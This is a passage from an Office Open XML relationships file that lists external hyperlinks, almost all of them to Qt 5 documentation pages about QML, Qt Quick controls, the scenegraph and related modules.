Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-tumblerstyle.html" TargetMode="External"/><Relationship Id="rId1621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-system-content-multiplepainters-qml.html" TargetMode="External"/><Relationship Id="rId1719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2090" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-textureinsgnode-example.html" TargetMode="External"/><Relationship Id="rId2395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt.io/download" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId2048" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterial.html" TargetMode="External"/><Relationship Id="rId2255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId3001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-codesamples.html" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-calendar-calendarmodel.html" TargetMode="External"/><Relationship Id="rId879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodelgroup.html" TargetMode="External"/><Relationship Id="rId2462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId2767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-audio.html" TargetMode="External"/><Relationship Id="rId1064" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-mapcircle.html" TargetMode="External"/><Relationship Id="rId1271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-selectionlistmodel.html" TargetMode="External"/><Relationship Id="rId1369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-textfieldstyle.html" TargetMode="External"/><Relationship Id="rId1576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-topic.html" TargetMode="External"/><Relationship Id="rId2115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations-d3d12.html" TargetMode="External"/><Relationship Id="rId2322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols2-differences.html" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-text.html" TargetMode="External"/><Relationship Id="rId946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-gammaadjust.html" TargetMode="External"/><Relationship Id="rId1131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-orientationsensor.html" TargetMode="External"/><Relationship Id="rId1229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-regexpvalidator.html" TargetMode="External"/><Relationship Id="rId1783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId1990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId2627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractlistmodel.html" TargetMode="External"/><Relationship Id="rId2834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtransformnode.html" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dshaderprecisionformat.html" TargetMode="External"/><Relationship Id="rId1436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-visualdatagroup.html" TargetMode="External"/><Relationship Id="rId1643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId1850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId2901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId1503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtest-overview.html" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-directoryimports.html" TargetMode="External"/><Relationship Id="rId1808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId3023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-running-targets.html" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/resources.html" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-leveladjust.html" TargetMode="External"/><Relationship Id="rId2277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keynavigation.html" TargetMode="External"/><Relationship Id="rId2484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId2691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/09-qdoc-commands-includingimages.html" TargetMode="External"/><Relationship Id="rId663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-dynamicobjectcreation.html" TargetMode="External"/><Relationship Id="rId870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-cylindergeometry.html" TargetMode="External"/><Relationship Id="rId1086" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-menubar.html" TargetMode="External"/><Relationship Id="rId1293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-sortpolicy.html" TargetMode="External"/><Relationship Id="rId2137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId2344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtbluetooth-index.html" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-var.html" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtpositioning-qmlmodule.html" TargetMode="External"/><Relationship Id="rId968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-groupbox.html" TargetMode="External"/><Relationship Id="rId1153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathpercent.html" TargetMode="External"/><Relationship Id="rId1598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId2204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols2-chattutorial-example.html" TargetMode="External"/><Relationship Id="rId2856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcontext.html" TargetMode="External"/><Relationship Id="rId730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animator.html" TargetMode="External"/><Relationship Id="rId828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-closeevent.html" TargetMode="External"/><Relationship Id="rId1013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-itemparticle.html" TargetMode="External"/><Relationship Id="rId1360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-technique.html" TargetMode="External"/><Relationship Id="rId1458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webengineprofile.html" TargetMode="External"/><Relationship Id="rId1665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/TR/2009/WD-webdatabase-20091029/" TargetMode="External"/><Relationship Id="rId1872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-lineshape.html" TargetMode="External"/><Relationship Id="rId2411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId2716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId1220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-radiodelegate.html" TargetMode="External"/><Relationship Id="rId1318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-state.html" TargetMode="External"/><Relationship Id="rId1525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-anchors.html" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qguiapplication.html" TargetMode="External"/><Relationship Id="rId2061" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialshader.html" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-referenceexamples-extended-example.html" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtlinguist-index.html" TargetMode="External"/><Relationship Id="rId892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-directionalblur.html" TargetMode="External"/><Relationship Id="rId2159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterial.html" TargetMode="External"/><Relationship Id="rId2366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-column.html" TargetMode="External"/><Relationship Id="rId2573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId2780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-qmlextensionplugins-qmlextensionplugins-pro.html" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/supported-platforms.html" TargetMode="External"/><Relationship Id="rId752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-bars3d.html" TargetMode="External"/><Relationship Id="rId1175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-placesearchsuggestionmodel.html" TargetMode="External"/><Relationship Id="rId1382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-timeouttransition.html" TargetMode="External"/><Relationship Id="rId2019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertychanges.html" TargetMode="External"/><Relationship Id="rId2640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmodelindex.html" TargetMode="External"/><Relationship Id="rId2878" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-opacitymask.html" TargetMode="External"/><Relationship Id="rId1035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-label.html" TargetMode="External"/><Relationship Id="rId1242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rotationanimation.html" TargetMode="External"/><Relationship Id="rId1687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-coordinates.html" TargetMode="External"/><Relationship Id="rId2500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-smoothedanimation.html" TargetMode="External"/><Relationship Id="rId2738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-var.html" TargetMode="External"/><Relationship Id="rId917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-exclusivegroup.html" TargetMode="External"/><Relationship Id="rId1102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-mousedevice.html" TargetMode="External"/><Relationship Id="rId1547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId1754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-rowlayout.html" TargetMode="External"/><Relationship Id="rId1961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId2805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickimageprovider.html" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-transition.html" TargetMode="External"/><Relationship Id="rId1614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId1919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-coordinates.html" TargetMode="External"/><Relationship Id="rId2083" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickimageprovider.html" TargetMode="External"/><Relationship Id="rId2290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/windows-deployment.html" TargetMode="External"/><Relationship Id="rId1197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-progressbar.html" TargetMode="External"/><Relationship Id="rId2150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerialshader.html" TargetMode="External"/><Relationship Id="rId2248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-int.html" TargetMode="External"/><Relationship Id="rId774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-button.html" TargetMode="External"/><Relationship Id="rId981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-holsterreading.html" TargetMode="External"/><Relationship Id="rId1057" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-loggingcategory.html" TargetMode="External"/><Relationship Id="rId2010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentanimation.html" TargetMode="External"/><Relationship Id="rId2662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsqlrecord.html" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-combobox.html" TargetMode="External"/><Relationship Id="rId1264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-scriptaction.html" TargetMode="External"/><Relationship Id="rId1471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-wlshellsurface.html" TargetMode="External"/><Relationship Id="rId1569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgrendererinterface.html" TargetMode="External"/><Relationship Id="rId2315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/edge3.png" TargetMode="External"/><Relationship Id="rId2522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://registry.gimp.org/node/20943" TargetMode="External"/><Relationship Id="rId2967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/scalability.html" TargetMode="External"/><Relationship Id="rId701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-abstractinputhandler3d.html" TargetMode="External"/><Relationship Id="rId939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-forwardrenderer.html" TargetMode="External"/><Relationship Id="rId1124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-objectmodel.html" TargetMode="External"/><Relationship Id="rId1331" 